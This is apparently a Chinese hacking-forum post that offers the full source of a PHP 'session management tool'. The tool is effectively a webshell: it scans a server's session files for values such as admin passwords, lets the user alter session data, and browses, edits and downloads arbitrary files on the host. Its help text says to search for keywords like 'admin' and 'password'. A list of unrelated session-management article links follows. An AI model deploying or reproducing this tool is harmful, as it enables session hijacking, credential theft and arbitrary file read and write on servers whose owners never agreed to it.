PHP服务端SESSION管理工具提供下载




文章作者:Inking
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

前两天我所在的楼层断了网,郁闷的我什么也干不了.之前刚好看到剑心的blog里有篇疯狗写的关于利用session渗透的文章,文章写得很简单,到最后" 小气"的疯狗也没有把利用程序发出来,所以我不管有没有用先把它写下来了.由于不能查资料,所以只好对这手册看,代码在很多方面可能还存在着缺陷.最烦人的还是正则和文件流操作的问题,循环来循环去的,把我的头都搞晕了,光是调试都花了整整一天的时间(写代码粗心大意没办法).希望大家多提提意见看法.. 疯狗的章:http://www.loveshell.net/blog/blogview.asp?logID=101

写好后我对程序的执行效率进行了大致的测试
执行环境:winxp,PHP5,apache2,酷睿2050--1.6GHZ,512m内存,945主板
文件系统:6层目录,每层1000个文件,session文件大约为50-100字节
搜索这6000个文件大约需10-15s的执行时间,效率并不像我想象中的那么低.




代码如下:

<?
if(isset($_GET['download'])){
    $filename=$_GET['filename'];
    $dirname=$_GET['dirname'];
    ob_start();
    download($dirname,$filename);
    flush;
}
session_start();
$default=ini_get('session.save_path');
$thispath=str_replace("\\","/",__FILE__);
$thispath=substr($thispath,0,strrpos($thispath,"/"));
?>
<html>
<head>
<title>SESSION管理工具</title>
<head>
<style>
body{
    margin:0;
    padding:0;
    background:#000000;
    color:green;
    margin-top=60px;
    FONT-FAMILY: verdana;
    FONT-SIZE: 10px;
}
input{
    margin:0px;
    padding:0px;
    color:green;
    border: 1px;
    border-bottom-color:#ffffff;
}
hr{
    width:85%;
    height:1px;
}
</style>
</head>
<body><center><h3>PHP服务端SESSION管理工具</h3><p><a href=<? echo $_SESSION['PHP_SELF'];?>?help=yes>(使用方法)</a>                    <a href="<? echo $_SESSION['PHP_SELF'];?>?fcontrol=yes&dirname=<? echo $thispath;?>">(文件操作)</a></p>
<hr>
<p> </p>
<table border=1 bordercolorlight="000000" bordercolordark="000000">
<form action=<? echo $_SERVER['PHP_SELF'];?> method=GET>
<tr><td><b>    SESSION路径 </b><input type=text name=spath value="<? echo $default;?>"> </td></tr>
<tr><td><input type="radio" checked name="fetch" value=searchone onclick="sessname.disabled=false;"><b>搜索指定SESSION</b>
<input type=text name=sessname>  
<tr><td><input type="radio" name="fetch" value=all onclick="sessname.disabled=true;"><b>读取所有SESSION</b>
<input type=submit value=读取>   <input type=reset value=重置></td></tr></form></table><p></p>
<table border=1 bordercolorlight="000000" bordercolordark="000000">
<?
set_time_limit(0);
if(PHP_VERSION < '4.1.0') {
    $_POST = &$HTTP_POST_VARS;
    $_GET = &$HTTP_GET_VARS;
}
$spath=$_GET['spath'];
if(isset($_GET['fetch'])){//关键词搜索
    if(isset($_GET['fetch']['searchon'])&&isset($_GET['sessname'])&&$type="1"){
        !empty($_GET['sessname']) or die("<tr><td><font color=#B3614D>请输入搜索关键字</font></td></tr>");
        $sessname=$_GET['sessname'];
        getfname($spath);
        count($session)>0 or die("<tr><td><font color=#B3614D>内容为空,请检查目录的正确性或者修改关键字</font></td></tr>");
        foreach($session as $fpath=>$sessinfo){
            foreach($sessinfo as $sessid=>$contents){
                echo "<tr><p><td><a href=?modfname=".$fpath."&modname=".$sessid."&modify=1>SID: ".$sessid."</a></td></p></tr>";
                foreach($contents as $name=>$value)
                    echo "<tr><td><p>".$name."=>".$value."</p></td></tr>";
            }
        }
    }
    elseif(isset($_GET['fetch']['all'])){//查找全部
        $type=0;
        getfname($spath);
        count($session)>0 or die("<tr><td><font color=#B3614D>内容为空,请检查目录的正确性</font></td></tr>");
        foreach($session as $fpath=>$sessinfo){
            foreach($sessinfo as $sessid=>$contents){
                echo "<tr><p><td><a href=?modfname=".$fpath."&modname=".$sessid."&modify=1>SID: ".$sessid."</a></td></p></tr>";
                foreach($contents as $name=>$value)
                    echo "<tr><td><p>".$name."=>".$value."</p></td></tr>";
            }
        }
    }
    echo "</center></table>";
}
if(isset($_GET['modify'])){//显示某个文件下的内容
    $modify=$_GET['modify'];
    $fpath=$_GET['modfname'];
    $sid=$_GET['modname'];
    getvalue($fpath,'1','');
    echo "<tr><td>你所修改的session文件的路径: <p>".$fpath."</p></td></tr>";
    echo "<form action=".$_SERVER['PHP_SELF']." method=post>";
    echo "<input type=hidden value=".$fpath." name=m_path>";
    !empty($modsession) or die("<tr><td><font color=#B3614D>内容为空,请检查目录的正确性</font></td></tr>");
    foreach($modsession as $modsessinfo){
            foreach($modsessinfo as $modsessid=>$contents){
                echo "<tr><p><td>SESSION_ID <input type=text name=m_sid value=".$modsessid.">  </td></p></tr>";
                $i=0;
                foreach($contents as $modname=>$modvalue){
                    echo "<tr><td><p>".$modname." => <input type=text name=m_value[".$i++."] value=".$modvalue."></p></td></tr>";
                }
            }
    }
    echo "<tr><td><input type=submit value=确认修改>  或<a href=".$_SERVER['PHP_SELF']."?modify_all=yes&modfname=".urlencode($fpath).">打开文件</a>进行完全编辑<a href=\"javascript:history.go(-1);\">或返回修改其它</a></td></tr></form></center></table>";
}
if(isset($_POST['m_path'])){//对单个值进行修改
    $m_path=$_POST['m_path'];
    $m_value=$_POST[m_value];
    $f=fopen($m_path,'r');
    $content=fgets($f,1024);
    $explode=explode(";",$content);
    fclose($f);
    $f=fopen($m_path,'w');
    $m_content='';
    for($i=0;$i<count($m_value);$i++){
        $modified=ereg_replace("\".*\"",'"'.$m_value[$i].'"',$explode[$i]);
        $m_content.=$modified.";";
    }
    fwrite($f,$m_content);
    fclose($f);
    echo "<tr><td>修改成功,<a href=".$_SERVER['HTTP_REFERER'].">返回重新修改该session文件</a></td></tr></center></table>";
}
if(isset($_GET['modify_all'])){//显示要修改的文件的内容
    $filepath=$_GET['modfname'];
    $f=fopen($filepath,"r");
    $fcontent=fread($f,filesize($filepath));
    echo "<tr><td>你正修改的文件是".$filepath;
    echo "<form action=".$_SERVER['PHP_SELF']." method=post>";
    echo "<input type=hidden name=filepath value=".$filepath.">";
    echo "<center><textarea cols=100 rows=15 name=m_content>".$fcontent."</textarea></center>";
    echo "<p><input type=submit value=确认修改>    <a href=\"javascript:history.go(-1);\">返回上一步</a></form></p></td></tr></center></table>";
    fclose($f);
}
if(isset($_POST['m_content'])){//进行完全修改
    $m_content=$_POST['m_content'];
    $filepath=$_POST['filepath'];
    if(get_magic_quotes_gpc()) $m_content=stripslashes($m_content);
    $f=fopen($filepath,"w");
    fwrite($f,$m_content);
    fclose($f);
    echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?modify_all=yes&modfname=".urlencode($filepath).">点这里查看或重新修改</a></td></tr>";
    echo "<tr><td><a href=".$_SERVER['PHP_SELF'].">返回首页</a></td></tr></center></table>";
}
if(isset($_GET['help'])){//显示help
    print<<<eof
    <tr><td>本程序的功能是从指定的文件夹下读取本文件夹及其子文件夹下的所有session文件的值,或者搜索含有指定关键字的session文件,不过注意由于写得很粗略,没有用到数据库功能,所以不支持多个关键字搜索,请搜索类似"admin","pwd","user","password"等可能含有管理员信息的关键字.<br>如果服务器的访问量大,势必会产生很多session文件,最好用关键字的方法,并耐心等待,因为该程序要一个个的读取session文件,并进行匹配,效率之低可想而知.<br>由于这个程序就是为了从众多session文件中查找相关内容而设计的,所以并没有添加直接修改指定session文件的功能,而只是对搜索出来的session文件进行编辑.如果需要,请用记事本打开session文件进行编辑.你也可以提交如下url进行编辑:"http://test.com/session.php?modfname=<session文件的路径>&modname=<session_id>&modify=1".<br>在session路径的填写框中尽量用"/"来代替"\",windows的seesion文件默认保存路径为"c:/windows/temp",linux下为"/tmp",不过程序会自动帮你读出当前session所在的路径,如果需要读取其它的session请自行查找,并手动填入.如果知道你所需要的session文件的具体文件夹,最好具体指明,这样可以省时一些.点"读取"后会显示出搜索结果,以"session_name=>value"的形式显示你所搜索到的结果,点击对应的session_id进入编辑状态,点击"确定修改"进行相关内容的修改,或者点"打开文件"进行完全编辑,然后确认保存.<br>如果目录填写不正确或者目录中的session文件都为空,那么程序会报错"目录中无session文件",这个时候请仔细检查.<br>程序做好后一直因为网络没有恢复,所以我又添加了个简单的文件操作功能,方便使用吧<br>因为我自己对正则不是很熟悉,对session的工作原理可能也了解的不是很透彻,前前后后花了两天的时间才写好,光调试就花了我大半的时间,所以bug难免,尤其在正则匹配方面,欢迎到我的博客交流.<br>作这个程序的灵感来自疯狗的两篇文章,请参阅:http://www.loveshell.net/blog/blogview.asp?logID=101<br>具体使用时请自行删除本帮助文档,本程序归Inking所有,仅供交流,一切使用上造成的后果于作者无关.</td></tr></center></table>
eof;
}
if(isset($_GET['fcontrol'])){
    $dirname=$_GET['dirname'];
    if($dirname[strlen($dirname)-1]!="\\"&&$dirname[strlen($dirname)-1]!="/") $dirname.="/";
    echo "<tr><td>当前文件路径: ".$dirname."</td></tr>";
    $opendir=opendir($dirname) or die("<tr><td><font color=#B3614D>打开文件失败</font></td></tr>");
    while($file=readdir($opendir)){
        if($file=="."){
            echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?fcontrol=yes&dirname=".urlencode($dirname).">".$file."</a></td></tr>";
            continue;
        }
        elseif($file==".."){
            $newname=substr($dirname,0,strrpos($dirname,"/"));
            $newname=substr($newname,0,strrpos($newname,"/")+1);
            echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?fcontrol=yes&dirname=".urlencode($newname).">".$file."</a></td></tr>";
        }
        elseif(is_dir($dirname.$file."/")){
            echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?fcontrol=yes&dirname=".urlencode($dirname.$file)."/>".$file."</a></td></tr>";
        }
        elseif(getftype($file)){
            echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?modify_all=yes&modfname=".urlencode($dirname.$file).">".$file."</a></td></tr>";
        }
        else{
            echo "<tr><td><a href=".$_SERVER['PHP_SELF']."?download=yes&filename=".urlencode($file)."&dirname=".urlencode($dirname).">".$file."</a></td></tr>";
        }
    }
}
function getfname($spath){//遍历目录,并调用getvalue()函数得到各个session_name的值
    global $fpath,$file;
    if($spath[strlen($spath)-1]!="\\"&&$spath[strlen($spath)-1]!="/") $spath.="/";
    $opendir=opendir($spath) or die("<tr><td><font color=#B3614D>打开文件失败</font></td></tr>");
    while($file=readdir($opendir)){
        if($file=="."||$file=="..") continue;
        if(is_dir($spath.$file."/")){
            getfname($spath.$file."/");
        }
        elseif(ereg("^sess_",$file)){
            $fpath=$spath.$file;
            preg_match('/(^sess_)(.+)+/',$file,$prex);
            $file=$prex[2];
            getvalue($fpath,'0',$type);
        }
    }
    closedir($opendir);
}
function getvalue($fpath,$modify='0',$type){//得到某个session文件中的session变量的值
    global $type,$fpath,$sessname,$session,$file,$modsession,$sid;
    $f=fopen($fpath,"a+");
    $content=fgets($f,1024);
    fclose($f);
    $explode=explode(";",$content);
    $i=0;
    while($match=$explode[$i++]){
        preg_match('/(^[^\|]*)+\|.+\"(.+)+\"$/',$match,$value);
        $sname=$value[1];
        $svalue=$value[2];
        if($modify==1){
            $modsession[$fpath][$sid][$sname]=$svalue;
            continue;
        }
        if($type){
            if(eregi($sessname,$sname)==true){
                $session[$fpath][$file][$sname]=$svalue;
            }
        }
        else{
            $session[$fpath][$file][$sname]=$svalue;
        }
    }
}
function getftype($filename){//判断文件类型
    $ftype=substr($filename,strrpos($filename,".")+1);
    switch($ftype){
        case "txt":
            return true;
        case "asp":
            return true;
        case "php":
            return true;
        case "ini":
            return true;
        case "log":
            return true;
        default:
            return false;
    }
}
function download($dirname,$filename){
    $f=fopen($dirname.$filename,"r");
    $contents=fread($f,filesize($dirname.$filename));
    fclose($f);
    Header("Content-type: application/octet-stream");
    Header("Accept-Ranges: bytes");
    Header("Accept-Length: ".filesize($dirname.$filename));
    Header("Content-Disposition: attachment; filename=".$filename);
    echo $contents;
}
?>
</table>
<p> </p>
<hr>
<center><p>Code By Inking   <a href='http://hi.baidu.com/in_king'>The Entry To My Website</a>   QQ: 165068585</p><p> </p>
</center>
</body>
</html>

下载

(0)

相关推荐

  • 深入浅析TomCat Session管理分析

    前言 对于广大java开发者而已,对于J2EE规范中的Session应该并不陌生,我们可以使用Session管理用户的会话信息,最常见的就是拿Session用来存放用户登录.身份.权限及状态等信息.对于使用Tomcat作为Web容器的大部分开发人员而言,Tomcat是如何实现Session标记用户和管理Session信息的呢? 概要 SESSION Tomcat内部定义了Session和HttpSession这两个会话相关的接口,其类继承体系如图1所示. 图1 Session类继承体系 图1中额

  • Java中tomcat memecached session 共享同步问题的解决办法

    事件缘由:一个主项目"图说美物",另外一个子功能是品牌商的入驻功能,是跟主项目分开的项目,为了共享登录的用户信息,而实现session共享,俩个tomcat,一个tomcat6,一个tomcat7 web项目windows系统下实现session的共享 第一个步: 在俩个tomcat的context.xml这个文件中配置如下代码: <Manager className="de.javakaffee.web.msm.MemcachedBackupSessionManage

  • Tomcat集群和Session复制应用介绍

    一个配置文件: 复制代码 代码如下: <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster" channelSendOptions="6"> <Manager className="org.apache.catalina.ha.session.BackupManager" expireSessionsOnShutdown="false"

  • JavaWeb Session 会话管理实例详解

    Session会话简介 会话是指在一段时间内,用户使用同一个浏览器进程与Web应用之间的交互过程. 会话(Session)通常用来跟踪用户的状态,缓存用户在此浏览器进程中的信息. 当用户关闭浏览器,上一个Session也就无法再次获得了(Cookie的maxAge为-1的情况).再次打开新的浏览器,将开始一个新的会话. 类javax.servlet.http.HttpSession.每一个HttpSession代表用户的一个会话. 每一个Session的过期时间默认为30分钟. 当浏览器第一次访

  • Asp.Net中NHiernate的Session的管理

    NHibernate中的Session,在我的理解似乎就相当于数据库中连接.因为它也有Open/Close的方法,我没有研究NHibernate的源码,不知道这种理解是否有误?我在网上搜了很多的关于Session的管理,大多都是在我需要数据库操作的时候,就OpenSession(),操作完后就CloseSession().这有点拟似如我们刚开始学习ADO.NET的时候,要Connection对象Open(),数据处理完后就Close().但是这里就带来了一个弊端,因为Connection的频繁的

  • Hibernate管理Session和批量操作分析

    本文详细分析了Hibernate管理Session和批量操作的用法.分享给大家供大家参考.具体分析如下: Hibernate管理Session Hibernate自身提供了三种管理Session对象的方法 ① Session对象的生命周期与本地线程绑定 ② Session对象的生命周期与JTA事务绑定 ③ Hibernate委托程序管理Session对象的生命周期 在Hibernate的配置文件中,hibernate.current_session_context_class属性用于指定Sess

  • Tomcat中session的管理机制

    详细描述Tomcat中session的管理机制: 1. 请求过程中的session操作: 简述:在请求过程中首先要解析请求中的sessionId信息,然后将sessionId存储到request的参数列表中.然后再从 request获取session的时候,如果存在sessionId那么就根据Id从session池中获取session,如果sessionId不 存在或者session失效,那么则新建session并且将session信息放入session池,供下次使用. (1)SessionId

  • ASP.NET网站管理系统退出 清除浏览器缓存,Session的代码

    1.在系统登陆成功时记录登陆的用户名.密码等信息(登陆功能的部分代码) 复制代码 代码如下: Session["id"] = user.id.ToString(); Session["name"] = user.name.ToString(); Session["pwd"] = user.password.ToString(); Session["time"] = user.LoginTime.ToString(); Sess

  • PHP 使用MySQL管理Session的回调函数详解

    复制代码 代码如下: <?php class MySession extends DBSQL { /**   * __construct()   */  public function __construct() {   parent::__construct (); } /**   * open()   *    * @param <String> $sSavePath   * @param <String>$sSessionNames   *    * @return &

  • asp.net页面状态管理cookie和服务器状态管理Session

    Cookie:是存储在客户端文件系统的文本文件中或客户端浏览器对话的客户端浏览器对话的内存中的少量的数据.当我们在访问一个网站网页,当用户请求该网页时,应用程序会首先检查用户在此前是否已经登录过,我们可以通过读取Cookie获取用户信息来判断是否让它继续访问 记录Cookie信息 创建一个名称是user的Cookie对象:HttpCookie cookie=new HttpCookie("user"); 给Cookie赋值,只能使用字符串赋值:cookie.Value="ch

随机推荐